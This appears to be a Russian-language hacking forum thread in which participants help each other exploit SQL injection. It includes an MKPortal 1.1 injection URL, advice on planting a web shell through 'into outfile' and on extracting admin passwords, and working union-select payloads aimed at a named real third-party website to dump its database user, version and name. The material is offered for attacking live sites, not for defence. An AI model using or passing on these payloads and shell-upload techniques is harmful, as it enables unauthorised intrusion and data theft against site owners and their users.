ВСем Прюэт! Есть такая уязвимость в MKportale 1.1: _http://www.securityfocus.com/archive/1/485035 HTML: : Discovery by: Sw33t h4cK3r : POWERED BY : MKPortal M1.1 Exploit : http://Example.com index.php?ind=gallery&op=foto_show&ida=(sql) Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи
2DDoSька так я не понял в чем заключаеться вопрос ? дай линк то хотя бы что можно в ПМ просто по описанию эт обычноая скуль иньекция 2Ershik там нету иньекции входяшие значения приводяться к integer о чем и говорит ошибка
как залить шелл через скуль инжект? знаю путь где лежит сайт, с помощью подзапросов (substring((select+user())..... вывел чудесное слово Root, короче все это не важно, меня интересует как залить шелл через скулю ?
s_p_a_m если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)
каким образом вытянуть пароли ? выводимых полей нет? поделись знаниями, так как я такой скулей первый раз работаю
бред зачем выводимые поля при залитии шелла ??? тебе нужно знать имя хотя бы одной таблицы и установочную директорию если есть filepriv насколь я понял у тебя root тогда лей спокойно через into outfile !
Хм не чего не пойму ) http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1 http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4 запросы такого рода проходят а что то типа http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1 выдает ошибку типа: right syntax to use near 'GROUP BY downloads.id если завершить запрос "--" or "*/" то ошибка такого рода : "Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause" подскажите в чем проблема ?
MaSTeR GэN http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1/* http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database())/* вывод в title
очень странный ответ в MS Access: http://xxx.com/Detail.asp?ad_id=2968+order+by+1 кто сталкивался с подобным и что это?
вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...
В запросе используется одна из функций (MIN(),MAX(),COUNT().. При их использовании обязательна группировка по одному из полей, а ты обрезаешь завершающий групбай комментарием... http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+1/* вот так надо